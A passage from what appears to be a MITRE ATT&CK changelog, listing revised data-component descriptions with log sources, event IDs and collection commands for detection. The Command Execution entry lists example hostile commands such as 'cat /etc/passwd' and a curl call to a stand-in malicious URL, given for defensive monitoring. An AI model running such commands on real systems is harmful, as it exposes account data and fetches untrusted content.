- Threat Intelligence Feeds
- External feeds track malicious personas linked to disinformation campaigns or phishing.
- OSINT Tools
- Maltego, SpiderFoot, and OpenCTI can map social media persona relationships.
- Endpoint Detection
- EDR logs user behavior and alerts on suspicious social media interactions.
- SIEM Logging
- Detects access to known phishing pages or social media abuse via proxy logs.
- Dark Web Monitoring
- Identifies compromised social media credentials being sold. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
User Account: User Account Authentication
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-07T16:19:46.282Z | 2025-04-18T15:09:42.067Z |
description | An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4776 or /var/log/auth.log) | An attempt (successful and failed login attempts) by a user, service, or application to gain access to a network, system, or cloud-based resource. This typically involves credentials such as passwords, tokens, multi-factor authentication (MFA), or biometric validation.
*Data Collection Measures:*
- Host-Based Authentication Logs
- Windows Event Logs
- Event ID 4776 – NTLM authentication attempt.
- Event ID 4624 – Successful user logon.
- Event ID 4625 – Failed authentication attempt.
- Event ID 4648 – Explicit logon with alternate credentials.
- Linux/macOS Authentication Logs
- `/var/log/auth.log`, `/var/log/secure` – Logs SSH, sudo, and other authentication attempts.
- AuditD – Tracks authentication events via PAM modules.
- macOS Unified Logs – `/var/db/diagnostics` captures authentication failures.
- Cloud Authentication Logs
- Azure AD Logs
- Sign-in Logs – Tracks authentication attempts, MFA challenges, and conditional access failures.
- Audit Logs – Captures authentication-related configuration changes.
- Microsoft Graph API – Provides real-time sign-in analytics.
- Google Workspace & Office 365
- Google Admin Console – `User Login Report` tracks login attempts and failures.
- Office 365 Unified Audit Logs – Captures logins across Exchange, SharePoint, and Teams.
- AWS CloudTrail & IAM
- Tracks authentication via `AWS IAM AuthenticateUser` and `sts:GetSessionToken`.
- Logs failed authentications to AWS Management Console and API requests.
- Container Authentication Monitoring
- Kubernetes Authentication Logs
- kubectl audit logs – Captures authentication attempts for service accounts and admin users.
- Azure Kubernetes Service (AKS) and Google Kubernetes Engine (GKE) – Logs IAM authentication events. |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
User Account: User Account Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:09:54.515Z |
description | Initial construction of a new account (ex: Windows EID 4720 or /etc/passwd logs) | The initial establishment of a new user, service, or machine account within an operating system, cloud environment, or identity management system.
*Data Collection Measures:*
- Host-Based Logging
- Windows Event Logs
- Event ID 4720 – A new user account was created.
- Event ID 4732/4735 – A user was added to a privileged group.
- Event ID 4798 – Enumeration of user accounts.
- Linux/macOS Authentication Logs
- `/var/log/auth.log`, `/var/log/secure` – Logs `useradd`, `adduser`, `passwd`, and `groupmod` activities.
- AuditD – Detects new account creation via PAM (`useradd`, `usermod`).
- OSQuery – The `users` table tracks newly created accounts.
- Cloud-Based Logging
- Azure AD Logs
- Azure AD Audit Logs – Tracks new user and service account creation.
- Azure Graph API – Provides logs on new account provisioning.
- AWS IAM & CloudTrail Logs
- CreateUser, CreateRole – Tracks new IAM user creation.
- AttachRolePolicy – Identifies privilege escalation via account creation.
- Google Workspace & Office 365 Logs
- Google Admin Console – Logs user creation in User Accounts API.
- Microsoft 365 Unified Audit Log – Tracks new account provisioning.
- Container & Network Account Creation Logs
- Kubernetes Account Creation Logs
- kubectl audit logs – Detects new service account provisioning.
- GKE/Azure AKS Logs – Track new container service accounts. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
User Account: User Account Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:09:57.711Z |
description | Removal of an account (ex: Windows EID 4726 or /var/log access/authentication logs) | The removal of a user, service, or machine account from an operating system, cloud identity management system, or directory service.
*Data Collection Measures:*
- Host-Based Logging
- Windows Event Logs
- Event ID 4726 – A user account was deleted.
- Event ID 4733/4735 – A user was removed from a privileged group.
- Event ID 1102 – Security log was cleared (potential cover-up).
- Linux/macOS Authentication Logs
- `/var/log/auth.log`, `/var/log/secure` – Logs `userdel`, `deluser`, `passwd -l`.
- AuditD – Tracks account deletions via PAM events (`userdel`).
- OSQuery – The `users` table can detect account removal.
- Cloud-Based Logging
- Azure AD Logs
- Azure AD Audit Logs – Tracks user and service account deletions.
- Azure Graph API – Monitors identity changes.
- AWS IAM & CloudTrail Logs
- `DeleteUser`, `DeleteRole` – Tracks IAM user deletion.
- DetachRolePolicy – Identifies privilege revocation before deletion.
- Google Workspace & Office 365 Logs
- Google Admin Console – Logs user removal activities.
- Microsoft 365 Unified Audit Log – Captures deleted accounts in Active Directory.
- Container & Network Account Deletion Logs
- Kubernetes Service Account Deletion
- kubectl audit logs – Detects when service accounts are removed from pods.
- GKE/Azure AKS Logs – Track containerized identity removals. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
User Account: User Account Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:09:51.231Z |
description | Changes made to an account, such as permissions and/or membership in specific groups (ex: Windows EID 4738 or /var/log access/authentication logs) | Changes made to an existing user, service, or machine account, including alterations to attributes, permissions, roles, authentication methods, or group memberships.
*Data Collection Measures:*
- Host-Based Logging
- Windows Event Logs
- Event ID 4738 – A user account was changed.
- Event ID 4725 – A user account was disabled.
- Event ID 4724 – An attempt was made to reset an account's password.
- Event ID 4767 – A user account was unlocked.
- Linux/macOS Authentication Logs
- `/var/log/auth.log`, `/var/log/secure` – Tracks account modifications (`usermod`, `chage`, `passwd`).
- AuditD – Monitors account changes (`useradd`, `usermod`, `gpasswd`).
- OSQuery – Queries the `users` table for recent modifications.
- Cloud-Based Logging
- Azure AD Logs
- Azure AD Audit Logs – Tracks modifications to users and security groups.
- Azure Graph API – Captures changes to authentication policies and MFA settings.
- AWS IAM & CloudTrail Logs
- `ModifyUser`, `UpdateLoginProfile` – Captures changes to IAM user attributes.
- `AttachUserPolicy`, `AddUserToGroup` – Detects policy and group modifications.
- Google Workspace & Office 365 Logs
- Google Admin Console – Logs account changes, role modifications, and group membership updates.
- Microsoft 365 Unified Audit Log – Captures modifications to security settings and privileged account changes.
- Container & Network Account Modification Logs
- Kubernetes Service Account Changes
- kubectl audit logs – Detects service account modifications in Kubernetes clusters.
- GKE/Azure AKS Logs – Monitors role and permission changes. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Volume: Volume Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:17:19.083Z |
description | Initial construction of a cloud volume (ex: AWS create-volume) | The initial provisioning of block storage volumes in cloud or on-prem environments, typically used for data storage, backup, or workload scaling.
*Data Collection Measures:*
- Cloud-Based Logging & Monitoring
- AWS CloudTrail
- `CreateVolume` – Logs the creation of new Amazon Elastic Block Store (EBS) volumes.
- `RunInstances` – Can be correlated to detect automatic volume provisioning.
- Azure Monitor & Log Analytics
- `Microsoft.Compute/disks/write` – Captures creation of new managed/unmanaged disks.
- `Microsoft.Storage/storageAccounts/write` – Detects creation of new Azure Blob Storage volumes.
- Google Cloud Logging (GCP)
- `compute.disks.insert` – Tracks new persistent disk creation.
- `compute.instances.attachDisk` – Logs attachment of a volume to a running VM.
- OpenStack Logs
- `volume.create` – Captures new storage volume provisioning.
- `cinder.volume.create` – Logs OpenStack Cinder block storage creation.
- Host-Based & SIEM Detection
- Linux/macOS System Logs
- `/var/log/syslog` & `/var/log/messages` – Detects new mount points or attached storage.
- `dmesg | grep "new disk"` – Identifies kernel messages for volume attachment.
- AuditD: Tracks `mkfs` (filesystem creation) for new volume provisioning.
- Windows Event Logs
- Event ID 1006 (Storage Management Events) – Captures disk volume creation.
- Event ID 5145 (Object Access: File Share) – Detects access to newly created storage shares. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Volume: Volume Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:17:25.575Z |
description | Removal of a a cloud volume (ex: AWS delete-volume) | The removal of a cloud-based or on-premise block storage volume. This action permanently deletes the allocated storage and may result in data loss if not backed up.
*Data Collection Measures:*
- Cloud Logging & APIs
- AWS CloudTrail Logs
- `eventName: DeleteVolume` (tracks volume deletions)
- Azure Monitor Logs
- `operationName: Microsoft.Compute/disks/delete`
- `status: Success | Failure` (flag unauthorized delete attempts)
- Google Cloud Audit Logs
- `protoPayload.methodName: "v1.compute.disks.delete"`
- `authenticationInfo.principalEmail` (identifies the user deleting the volume)
- System & Host-Based Logging
- Linux & macOS Logs:
- `/var/log/syslog` or `/var/log/messages` for volume detach/deletion actions
- Windows Event Logs:
- Event ID 98 (Storage Class Memory)
- Event ID 225 (Volume Removal Detected)
- Event ID 12 (Disk Removal Notification) |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
WMI: WMI Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:16:25.136Z |
description | Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21) | Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or providers.
*Data Collection Measures:*
- Windows Security Event Logs:
  - Event ID 5861 (WMI Permanent Event Subscription)
  - Event ID 5860 (WMI Event Filter Activity)
  - Event ID 5857 (WMI Event Consumer Activity)
- Sysmon Logs:
  - Sysmon Event ID 19 – WMI Event Filter Created
  - Sysmon Event ID 20 – WMI Event Consumer Created
  - Sysmon Event ID 21 – WMI Event Binding Created
- Endpoint Detection & Response (EDR)
  - Detects WMI-based persistence techniques. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Windows Registry: Windows Registry Key Access
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:12:12.634Z |
description | Opening a Registry Key, typically to read the associated value (ex: Windows EID 4656) | The action of opening a specific Windows Registry key, typically to read its associated value. This activity can be used for system configuration, application settings retrieval, and security policies.
*Data Collection Measures:*
- Windows Event Logs
  - Event ID 4656 - Handle to an Object was Requested: Logs attempts to open registry keys.
  - Event ID 4663 - An Object was Accessed: Captures read/write operations on registry keys.
  - Event ID 4657 - Registry Value Modification: Useful for detecting changes to registry keys after being accessed.
- Sysmon
  - Sysmon Event ID 13 - Registry Value Set: Captures modifications to existing registry keys.
- Endpoint Detection and Response (EDR) Solutions
  - Provide telemetry on registry key access activities, especially when linked to suspicious processes. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Windows Registry: Windows Registry Key Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:12:09.376Z |
description | Initial construction of a new Registry Key (ex: Windows EID 4656 or Sysmon EID 12) | Initial construction of a new registry key within the Windows operating system.
*Data Collection Measures:*
- Windows Event Logs
  - Event ID 4656 - Registry Object Handle Requested: Tracks registry key access, including newly created keys.
  - Event ID 4657 - Registry Value Modification: Detects modifications to an existing registry key after creation.
- Sysmon (System Monitor) for Windows
  - Sysmon Event ID 12 - Registry Key Created: Logs when a new registry key is created. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Windows Registry: Windows Registry Key Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:12:03.268Z |
description | Removal of a Registry Key (ex: Windows EID 4658 or Sysmon EID 12) | The removal of a registry key within the Windows operating system.
*Data Collection Measures:*
- Windows Event Logs
  - Event ID 4658 - Registry Key Handle Closed: Captures when a handle to a registry key is closed, which may indicate deletion.
  - Event ID 4660 - Object Deleted: Logs when a registry key is deleted.
- Sysmon (System Monitor) for Windows
  - Sysmon Event ID 12 - Registry Key Deleted: Logs when a registry key is removed.
  - Sysmon Event ID 13 - Registry Value Deleted: Captures removal of specific registry values.
- Endpoint Detection and Response (EDR) Solutions
  - Monitor registry deletions for suspicious behavior. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Windows Registry: Windows Registry Key Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:11:59.993Z |
description | Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14) | Changes made to an existing registry key or its values. These modifications can include altering permissions, modifying stored data, or updating configuration settings.
*Data Collection Measures:*
- Windows Event Logs
  - Event ID 4657 - Registry Value Modified: Logs changes to registry values, including modifications to startup entries, security settings, or system configurations.
- Sysmon (System Monitor) for Windows
  - Sysmon Event ID 13 - Registry Value Set: Captures changes to specific registry values.
  - Sysmon Event ID 14 - Registry Key & Value Renamed: Logs renaming of registry keys, which may indicate evasion attempts.
- Endpoint Detection and Response (EDR) Solutions
  - Monitor registry modifications for suspicious behavior. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Patches
Sensor Health: Host Status
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-20T20:22:45.613Z | 2025-04-18T15:16:18.582Z |
description | Logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications) | Logging, messaging, and other artifacts that highlight the health and operational state of host-based security sensors, such as Endpoint Detection and Response (EDR) agents, antivirus software, logging services, and system monitoring tools. Monitoring sensor health is essential for detecting misconfigurations, sensor failures, tampering, or deliberate security control evasion by adversaries.
*Data Collection Measures:*
- Windows Event Logs:
  - Event ID 1074 (System Shutdown): Detects unexpected system reboots/shutdowns.
  - Event ID 6006 (Event Log Stopped): Logs when Windows event logging is stopped.
  - Event ID 16 (Sysmon): Detects configuration state changes that may indicate log tampering.
  - Event ID 12 (Windows Defender Status Change) – Detects changes in Windows Defender state.
- Linux/macOS Monitoring:
  - `/var/log/syslog`, `/var/log/auth.log`, `/var/log/kern.log`
  - Journald (journalctl) for kernel and system alerts.
- Endpoint Detection and Response (EDR) Tools:
  - Monitor agent health status, detect sensor tampering, and alert on missing telemetry.
- Mobile Threat Intelligence Logs:
  - Samsung Knox, SafetyNet, iOS Secure Enclave provide sensor health status for mobile endpoints. |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Image: Image Modification
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:16:02.863Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Instance: Instance Metadata
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:13:01.557Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Logon Session: Logon Session Metadata
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:12:23.075Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Malware Repository: Malware Metadata
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-20T20:20:12.165Z | 2025-04-18T15:16:09.096Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Process: Process Metadata
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:10:37.873Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Scheduled Job: Scheduled Job Metadata
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:11:39.543Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Scheduled Job: Scheduled Job Modification
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:11:40.267Z |
description | Changes made to a scheduled job, such as modifications to the execution launch (ex: Windows EID 4702 or /var/log cron logs) | Changes made to an existing scheduled job, including modifications to its execution parameters, command payload, or execution timing. |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Service: Service Metadata
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:51.004Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Snapshot: Snapshot Metadata
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:15:14.954Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
User Account: User Account Metadata
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:09:47.932Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Volume: Volume Enumeration
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:17:22.350Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Volume: Volume Metadata
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:17:15.849Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Volume: Volume Modification
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:17:12.667Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Web Credential: Web Credential Creation
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:13:30.118Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Web Credential: Web Credential Usage
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:13:26.927Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
mobile-attack
New Data Components
Process: OS API Execution
Current version: 1.1
Description:
Calls made by a process to operating system-provided Application Programming Interfaces (APIs). These calls are essential for interacting with system resources such as memory, files, and hardware, or for performing system-level tasks. Monitoring these calls can provide insight into a process's intent, especially if the process is malicious.
Data Collection Measures:
- Endpoint Detection and Response (EDR) Tools:
  - Leverage tools to monitor API execution behaviors at the process level.
  - Example: Sysmon Event ID 10 captures API call traces for process access and memory allocation.
- Process Monitor (ProcMon):
  - Use ProcMon to collect detailed logs of process and API activity. ProcMon can provide granular details on API usage and identify malicious behavior during analysis.
- Windows Event Logs:
  - Use Event IDs from Windows logs for specific API-related activities:
    - Event ID 4688: A new process has been created (can indirectly infer API use).
    - Event ID 4657: A registry value has been modified (to monitor registry-altering APIs).
- Dynamic Analysis Tools:
  - Tools like Cuckoo Sandbox, Flare VM, or Hybrid Analysis monitor API execution during malware detonation.
- Host-Based Logs:
  - On Linux/macOS systems, leverage audit frameworks (e.g., `auditd`, `strace`) to capture and analyze system call usage that APIs map to.
- Runtime Monitors:
  - Runtime security tools like Falco can monitor system-level calls for API execution.
- Debugging and Tracing:
  - Use debugging tools like gdb (Linux) or WinDbg (Windows) for deep tracing of API executions in real time.
Minor Version Changes
Command: Command Execution
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-07T16:14:39.124Z | 2025-04-18T15:11:30.145Z |
description | The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. ) | Command Execution involves monitoring and capturing the execution of textual commands (including shell commands, cmdlets, and scripts) within an operating system or application. These commands may include arguments or parameters and are typically executed through interpreters such as `cmd.exe`, `bash`, `zsh`, `PowerShell`, or programmatic execution. Examples:
- Windows Command Prompt
  - dir – Lists directory contents.
  - net user – Queries or manipulates user accounts.
  - tasklist – Lists running processes.
- PowerShell
  - Get-Process – Retrieves processes running on a system.
  - Set-ExecutionPolicy – Changes PowerShell script execution policies.
  - Invoke-WebRequest – Downloads remote resources.
- Linux Shell
  - ls – Lists files in a directory.
  - cat /etc/passwd – Reads the user accounts file.
  - curl http://malicious-site.com – Retrieves content from a malicious URL.
- Container Environments
  - docker exec – Executes a command inside a running container.
  - kubectl exec – Runs commands in Kubernetes pods.
- macOS Terminal
  - open – Opens files or URLs.
  - dscl . -list /Users – Lists all users on the system.
  - osascript -e – Executes AppleScript commands.
This data component can be collected through the following measures:
Enable Command Logging
- Windows:
  - Enable PowerShell logging: `Set-ExecutionPolicy Bypass`, `Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1`
  - Enable Windows Event Logging:
    - Event ID 4688: Tracks process creation, including command-line arguments.
    - Event ID 4104: Logs PowerShell script block execution.
- Linux/macOS:
  - Enable shell history logging in `.bashrc` or `.zshrc`: `export HISTTIMEFORMAT="%d/%m/%y %T "`, `export PROMPT_COMMAND='history -a; history -w'`
  - Use audit frameworks (e.g., `auditd`) to log command executions. Example rule to log all `execve` syscalls: `-a always,exit -F arch=b64 -S execve -k cmd_exec`
- Containers:
  - Use runtime-specific tools like Docker’s --log-driver or Kubernetes Audit Logs to capture exec commands.
Integrate with Centralized Logging
- Collect logs using a SIEM (e.g., Splunk) or cloud-based log aggregation tools like AWS CloudWatch or Azure Monitor. Example Splunk Search for Windows Event 4688:
  `index=windows EventID=4688 CommandLine=*`
Use Endpoint Detection and Response (EDR) Tools
- Monitor command executions via EDR solutions
Deploy Sysmon for Advanced Logging (Windows)
- Use Sysmon's Event ID 1 to log process creation with command-line arguments |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Network Traffic: Network Connection Creation
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-20T20:18:06.745Z | 2025-04-18T15:11:23.639Z |
description | Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log) | The initial establishment of a network session, where a system or process initiates a connection to a local or remote endpoint. This typically involves capturing socket information (source/destination IP, ports, protocol) and tracking session metadata. Monitoring these events helps detect lateral movement, exfiltration, and command-and-control (C2) activities.
*Data Collection Measures:*
- Windows:
  - Event ID 5156 – Filtering Platform Connection - Logs network connections permitted by Windows Filtering Platform (WFP).
  - Sysmon Event ID 3 – Network Connection Initiated - Captures process, source/destination IP, ports, and parent process.
- Linux/macOS:
  - Netfilter (iptables), nftables logs - Tracks incoming and outgoing network connections.
  - AuditD (`connect` syscall) - Logs TCP, UDP, and ICMP connections.
  - Zeek (`conn.log`) - Captures protocol, duration, and bytes transferred.
- Cloud & Network Infrastructure:
  - AWS VPC Flow Logs / Azure NSG Flow Logs - Logs IP traffic at the network level in cloud environments.
  - Zeek (conn.log) or Suricata (network events) - Captures packet metadata for detection and correlation.
- Endpoint Detection & Response (EDR):
  - Detect anomalous network activity such as new C2 connections or data exfiltration attempts. |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Network Traffic: Network Traffic Content
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:11:16.672Z |
description | Logged network traffic data showing both protocol header and body values (ex: PCAP) | The full packet capture (PCAP) or session data that logs both protocol headers and payload content. This allows analysts to inspect command and control (C2) traffic, exfiltration, and other suspicious activity within network communications. Unlike metadata-based logs, full content analysis enables deeper protocol inspection, payload decoding, and forensic investigations.
*Data Collection Measures:*
- Network Packet Capture (Full Content Logging)
- Wireshark / tcpdump / tshark
- Full packet captures (PCAP files) for manual analysis or IDS correlation. `tcpdump -i eth0 -w capture.pcap`
- Zeek (formerly Bro)
- Extracts protocol headers and payload details into structured logs. `echo "redef Log::default_store = Log::ASCII;" > local.zeek | zeek -Cr capture.pcap local.zeek`
- Suricata / Snort (IDS/IPS with PCAP Logging)
- Deep packet inspection (DPI) with signature-based and behavioral analysis. `suricata -c /etc/suricata/suricata.yaml -i eth0 -l /var/log/suricata`
- Host-Based Collection
- Sysmon Event ID 22 – DNS Query Logging, Captures DNS requests made by processes, useful for detecting C2 domains.
- Sysmon Event ID 3 – Network Connection Initiated, Logs process-to-network connection relationships.
